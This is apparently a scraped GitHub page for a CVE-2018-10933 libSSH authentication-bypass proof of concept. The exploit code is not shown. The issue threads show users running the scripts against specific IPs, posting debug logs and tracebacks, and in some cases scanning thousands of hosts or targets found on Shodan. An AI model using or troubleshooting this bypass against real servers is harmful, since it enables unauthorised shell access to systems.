blacknbunny / cve-2018-10933 Goto Github PK

View Code? Open in Web Editor NEW

495.0 495.0 119.0 78 KB

Spawn to shell without any credentials by using CVE-2018-10933 (LibSSH)

Python 100.00%

cve-2018-10933's People

Contributors

Stargazers

Watchers

Forkers

crypto-br hrk31c heikipikker cs8425 4n6strider wikijm budi-khoirudin listenquiet waghcwb baisesecxxx jm33-m0 5up3rc hkylin aoxang slowmistio pcanyi jiangsi520 secwsstest pumaxiaoyao ioanlongjing exloit huangyuan666 oswalpalash zzhacked tomasbystrom killvxk dannymas arongmh wllidr explife0011 rootsystem2010 grayhats ikv163 wicusross ducnp goudan2333 peterpeter228 silverwolfceh attacker34 nareshmail rootinshell pentestertn thejermy akiraaisha anhkhoa14592 kr1shn4murt1 shaunstanislauslau jcmoney ajay2007 gazcbm cybermonitor cjjduck sunnysidecruise lonehand orf53975 yanggongwang qsdj jackxu10 tyekrgk nu110x signedbytes rajatsharma94 oneiroi devhttps d1pakda5 neozion chingru vinsonzou drupalcompany derco0n crypticgeek msr00t cyberlight jotygill lovebair2022 guagua3 seunboi4u acv147258369 myxss gitr007 sambal0x nekulin edwinosky r3dfruitrollup nonimakaroni pprkutt toramanemre danielliang linhlhq cr0wn2600 kieranmasterton peacheychen kimocoder anarquias trickster1103 woshi56789 0x6b7966 mlynchcogent kingkarlito hkglue

cve-2018-10933's Issues

something wrong with bypasswithfakekey.py use

hello,i use it like that :python bypasswithfakekey.py --host 14.43.5.99 -key id_rsa.keyfile
result is:
Traceback (most recent call last):
File "bypasswithfakekey.py", line 49, in
main()
File "bypasswithfakekey.py", line 45, in main
except FileNotFoundError:
NameError: global name 'FileNotFoundError' is not defined
it can't work.
when i change line 45
(except FileNotFoundError:) to (except:) delete FileNotFoundError name.
run again,but the result is:
Generate a keyfile for tool to bypass remote/local server credentials.

Could you be more specific

How to use?!

Hey. I'm trying to figure out how to properly manage the exploit. I got some libsshs hashs (get from shodan.io). take a look at my output. Did you see something wrong?

python bypasswithfakekey.py --host 52.1.229.77 -p 22 -key /root/.ssh/id_rsa
DEBUG:paramiko.transport:starting thread (client mode): 0x88e4b910L
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2
INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2)
DEBUG:paramiko.transport:kex algos:[u'[email protected]', u'ecdh-sha2-nistp256', u'diffie-hellman-group14-sha1', u'diffie-hellman-group1-sha1'] server key:[u'ssh-dss', u'ssh-rsa'] client encrypt:[u'aes256-ctr', u'aes192-ctr', u'aes128-ctr', u'aes256-cbc', u'aes192-cbc', u'aes128-cbc', u'blowfish-cbc', u'3des-cbc', u'des-cbc-ssh1'] server encrypt:[u'aes256-ctr', u'aes192-ctr', u'aes128-ctr', u'aes256-cbc', u'aes192-cbc', u'aes128-cbc', u'blowfish-cbc', u'3des-cbc', u'des-cbc-ssh1'] client mac:[u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] server mac:[u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] client compress:[u'none', u'zlib', u'[email protected]'] server compress:[u'none', u'zlib', u'[email protected]'] client lang:[u''] server lang:[u''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: none
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),
DEBUG:paramiko.transport:kex engine KexGroup1 specified hash_algo
DEBUG:paramiko.transport:Switch to new keys ...
/usr/local/lib/python2.7/dist-packages/paramiko/client.py:689: UserWarning: Unknown ssh-rsa host key for 52.1.229.77: 7eb5d5f3702b10f6a4fe922e3b4810a3
key.get_fingerprint())))
DEBUG:paramiko.transport:Trying SSH agent key d1b81b29bee25b8e6e293aa5faa26fa8
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (publickey) failed.
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) failed.

Authentication bypassed but can't spawn to shell. The server you're trying to bypass is patched, truncated or using wrong vulnerable libSSH version. -blacknbunny

DEBUG:paramiko.transport:EOF in transport thread

Authentication Bypassed ?

paramiko.ssh_exception.AuthenticationException can be due to anything. So isn't "Authentication bypassed but can't spawn to shell." a bit specific ? How to make sure that authentication is really bypassed ?

Also, if authentication is bypassed, can it be exploited in any other way rather than spawning a shell ?

no shell back

i scan nearly 5000+ host with libssh influmned by this vuln ,but there was no shell with code
spawncmd.invoke_shell()

paramiko.log like this,dose it work correctly?

DEB [20181018-14:34:12.427] thr=1 paramiko.transport: starting thread (client mode): 0x3879c50L
DEB [20181018-14:34:12.428] thr=1 paramiko.transport: Local version/idstring: SSH-2.0-paramiko_2.4.2
DEB [20181018-14:34:12.441] thr=1 paramiko.transport: Remote version/idstring: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
INF [20181018-14:34:12.441] thr=1 paramiko.transport: Connected (version 2.0, client OpenSSH_7.2p2)
DEB [20181018-14:34:12.446] thr=1 paramiko.transport: kex algos:[u'[email protected]', u'ecdh-sha2-nistp256', u'ecdh-sha2-nistp384', u'ecdh-sha2-nistp521', u'diffie-hellman-group-exchange-sha256', u'diffie-hellman-group14-sha1'] server key:[u'ssh-rsa', u'rsa-sha2-512', u'rsa-sha2-256', u'ecdsa-sha2-nistp256', u'ssh-ed25519'] client encrypt:[u'[email protected]', u'aes128-ctr', u'aes192-ctr', u'aes256-ctr', u'[email protected]', u'[email protected]'] server encrypt:[u'[email protected]', u'aes128-ctr', u'aes192-ctr', u'aes256-ctr', u'[email protected]', u'[email protected]'] client mac:[u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] server mac:[u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'[email protected]', u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] client compress:[u'none', u'[email protected]'] server compress:[u'none', u'[email protected]'] client lang:[u''] server lang:[u''] kex follows?False
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: Kex agreed: ecdh-sha2-nistp256
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: HostKey agreed: ssh-ed25519
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: Cipher agreed: aes128-ctr
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: MAC agreed: hmac-sha2-256
DEB [20181018-14:34:12.447] thr=1 paramiko.transport: Compression agreed: none
DEB [20181018-14:34:12.630] thr=1 paramiko.transport: kex engine KexNistp256 specified hash_algo
DEB [20181018-14:34:12.631] thr=1 paramiko.transport: Switch to new keys ...
DEB [20181018-14:34:12.632] thr=2 paramiko.transport: [chan 0] Max packet in: 32768 bytes
WAR [20181018-14:34:12.670] thr=1 paramiko.transport: Oops, unhandled type 3 ('unimplemented')
WAR [20181018-14:34:12.720] thr=1 paramiko.transport: Oops, unhandled type 3 ('unimplemented')
DEB [20181018-14:36:12.437] thr=1 paramiko.transport: EOF in transport thread

It not work guy

Questions about libSSH-Authentication-Bypass

Client side:

$ python libsshauthbypass.py  --host 172.17.0.4 -p22
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),

Server Side:

$ ./samplesshd-cb --dsakey /root/.ssh/id_dsa --rsakey /root/.ssh/id_rsa 0.0.0.0 -p 22 -v
[2018/10/18 07:34:58.992643, 3] ssh_socket_pollcallback:  Received POLLOUT in connecting state
[2018/10/18 07:34:58.992749, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.992958, 3] callback_receive_banner:  Received banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.992987, 1] ssh_server_connection_callback:  SSH client banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993000, 1] ssh_analyze_banner:  Analyzing banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993060, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.993074, 3] packet_send2:  packet: wrote [len=516,padding=10,comp=505,payload=505]
[2018/10/18 07:34:58.993779, 3] ssh_packet_socket_callback:  packet: read type 20 [len=596,padding=8,comp=587,payload=587]
[2018/10/18 07:34:58.993814, 3] ssh_packet_process:  Dispatching handler for packet type 20
[2018/10/18 07:34:58.993844, 3] crypt_set_algorithms_server:  Set output algorithm aes128-ctr
[2018/10/18 07:34:58.993853, 3] crypt_set_algorithms_server:  Set input algorithm aes128-ctr
[2018/10/18 07:34:58.993860, 3] crypt_set_algorithms_server:  Set HMAC output algorithm to hmac-sha2-256
[2018/10/18 07:34:58.993869, 3] crypt_set_algorithms_server:  Set HMAC input algorithm to hmac-sha2-256
[2018/10/18 07:34:59.045960, 3] ssh_packet_socket_callback:  packet: read type 30 [len=140,padding=5,comp=134,payload=134]
[2018/10/18 07:34:59.046017, 3] ssh_packet_process:  Dispatching handler for packet type 30
[2018/10/18 07:34:59.046029, 3] ssh_packet_kexdh_init:  Received SSH_MSG_KEXDH_INIT
[2018/10/18 07:34:59.048511, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.048553, 3] packet_send2:  packet: wrote [len=700,padding=8,comp=691,payload=691]
[2018/10/18 07:34:59.048597, 3] packet_send2:  packet: wrote [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.048605, 3] dh_handshake_server:  SSH_MSG_NEWKEYS sent
[2018/10/18 07:34:59.048664, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.089804, 3] ssh_packet_socket_callback:  packet: read type 21 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.089866, 3] ssh_packet_process:  Dispatching handler for packet type 21
[2018/10/18 07:34:59.089880, 2] ssh_packet_newkeys:  Received SSH_MSG_NEWKEYS
[2018/10/18 07:34:59.089920, 3] ssh_handle_key_exchange:  ssh_handle_key_exchange: current state : 7
[2018/10/18 07:34:59.093583, 3] ssh_packet_socket_callback:  packet: read type 52 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.093626, 3] ssh_packet_process:  Dispatching handler for packet type 52
[2018/10/18 07:34:59.093693, 3] ssh_packet_userauth_success:  Authentication successful
[2018/10/18 07:34:59.145509, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]
[2018/10/18 07:34:59.145565, 3] ssh_packet_process:  Dispatching handler for packet type 90
[2018/10/18 07:34:59.145579, 3] ssh_packet_channel_open:  Clients wants to open a session channel
Allocated session channel
[2018/10/18 07:34:59.145602, 3] ssh_message_channel_request_open_reply_accept_channel:  Accepting a channel request_open for chan 0
[2018/10/18 07:34:59.145681, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.145709, 3] packet_send2:  packet: wrote [len=28,padding=10,comp=17,payload=17]
[2018/10/18 07:34:59.160915, 3] ssh_packet_socket_callback:  packet: read type 98 [len=28,padding=12,comp=15,payload=15]
[2018/10/18 07:34:59.160974, 3] ssh_packet_process:  Dispatching handler for packet type 98
[2018/10/18 07:34:59.160990, 3] ssh_message_handle_channel_request:  Received a shell channel_request for channel (43:0) (want_reply=1)
Allocated shell
[2018/10/18 07:34:59.161004, 3] ssh_message_channel_request_reply_success:  Sending a channel_request success to channel 0
[2018/10/18 07:34:59.161073, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.161101, 3] packet_send2:  packet: wrote [len=12,padding=6,comp=5,payload=5]
[2018/10/18 07:34:59.262384, 1] ssh_socket_exception_callback:  Socket exception callback: 1 (0)
[2018/10/18 07:34:59.262443, 1] ssh_socket_exception_callback:  Socket error: disconnected
Error : Socket error: disconnected

Do you know why it doesn't spawn a shell? Thank you.

error

File "libsshauthbypass.py", line 68, in
exit(main())
File "libsshauthbypass.py", line 65, in main
BypasslibSSHwithoutcredentials(hostname, port, command)
File "libsshauthbypass.py", line 35, in BypasslibSSHwithoutcredentials
spawncmd = transport.open_session(timeout=10)
File "/usr/local/lib/python2.7/dist-packages/paramiko/transport.py", line 712, in open_session
timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/paramiko/transport.py", line 836, in open_channel
raise e
EOFError

Administratively Prohibited

Hi !

First I would like to thank you for sharing this PoC to the community so we can patch our vulnerable servers. The main reason why I opened this issue is because I'm getting the following error message each times:

paramiko.ssh_exception.ChannelException: (1, 'Administratively prohibited')

Any help would be very appreciated.

Thanks

what is wrong here ?

what is wrong here ? installed python-paramiko

root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
File "asd.py", line 4, in
import paramiko
ModuleNotFoundError: No module named 'paramiko'

what's wrong ?

Hi
When I do python libsshauthbypass.py -h IP_ADDRESS -p 22 -log /home/test/1a.txt
It gives me response again help menu & logfile is empty

What I do wrong there ?
Thanks!

Always "Administratively prohibited..."

I've tested this with several apparently vulnerable SSH servers (using hassh values to identify them), and I've tried using it with the examplesshd-cb binary both on a remote system and on the local system using 127.0.0.1, but every attempt resulted in the "Administratively prohibited..." message. Below is the log from the local attempt that most directly follows your instructions:

examplesshd-cb-local.log

I had paramiko v2.4.2 and python v3.4.3 installed.

python libsshauthbypass.py

CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),

Allocated session channel
Allocated shell
Error : Socket error: disconnected

TCP forwarding disabled on the remote/local server can't connect.

TCP forwarding disabled on the remote/local server can't connect.
python libsshauthbypass.py --host 50.227.32.186 --port 22
No handlers could be found for logger "paramiko.transport"
TCPForwarding disabled on remote/local server can't connect.not vulnerable

cann you suggest troubleshooting this issue

what writes to log file ?

Hi
after running script is writes to log file without any error reponse

i run code root@test-VirtualBox:/home/test/libSSH-Authentication-Bypass# python3 libsshauthbypass.py --host xxx -p 2222 -log /home/test/Desktop/ccc.txt

and it writes to log file

DEB [20181020-12:33:16.184] thr=1 paramiko.transport: starting thread (client mode): 0x5e526940
DEB [20181020-12:33:16.185] thr=1 paramiko.transport: Local version/idstring: SSH-2.0-paramiko_2.4.2
DEB [20181020-12:33:16.327] thr=1 paramiko.transport: Remote version/idstring: SSH-2.0-libssh-0.5.2
INF [20181020-12:33:16.327] thr=1 paramiko.transport: Connected (version 2.0, client libssh-0.5.2)
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: kex algos:['diffie-hellman-group1-sha1'] server key:['ssh-dss', 'ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha1'] server mac:['hmac-sha1'] client compress:['none', 'zlib', '[email protected]'] server compress:['none', 'zlib', '[email protected]'] client lang:[''] server lang:[''] kex follows?False
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: Kex agreed: diffie-hellman-group1-sha1
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: HostKey agreed: ssh-rsa
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: Cipher agreed: aes128-ctr
DEB [20181020-12:33:16.470] thr=1 paramiko.transport: MAC agreed: hmac-sha1
DEB [20181020-12:33:16.471] thr=1 paramiko.transport: Compression agreed: none
DEB [20181020-12:33:16.730] thr=1 paramiko.transport: kex engine KexGroup1 specified hash_algo
DEB [20181020-12:33:16.809] thr=1 paramiko.transport: Switch to new keys ...
DEB [20181020-12:33:16.811] thr=2 paramiko.transport: [chan 0] Max packet in: 32768 bytes
DEB [20181020-12:33:17.048] thr=1 paramiko.transport: [chan 0] Max packet out: 35000 bytes
DEB [20181020-12:33:17.048] thr=1 paramiko.transport: Secsh channel 0 opened.
DEB [20181020-12:33:17.191] thr=1 paramiko.transport: [chan 0] Sesch channel 0 request ok

I don't know what is it and what to do with this or what to do after ??
Thanks !

Error with cmd

Why i received error when arrive at cmd?

raceback (most recent call last):
File "test.py", line 17, in
stdin, stdout, stderr = client.exec_command('ls')
File "/usr/local/lib/python2.7/dist-packages/paramiko/client.py", line 429, in exec_command
chan.exec_command(command)
File "/usr/local/lib/python2.7/dist-packages/paramiko/channel.py", line 62, in _check
return func(self, *args, **kwds)
File "/usr/local/lib/python2.7/dist-packages/paramiko/channel.py", line 240, in exec_command
self._wait_for_event()
File "/usr/local/lib/python2.7/dist-packages/paramiko/channel.py", line 1143, in _wait_for_event
raise e
paramiko.ssh_exception.SSHException: Channel closed.
DEBUG:paramiko.transport:EOF in transport thread

blacknbunny / cve-2018-10933 Goto Github PK

cve-2018-10933's People

Contributors

Stargazers

Watchers

Forkers

cve-2018-10933's Issues

Recommend Projects

Recommend Topics

Recommend Org

Jobs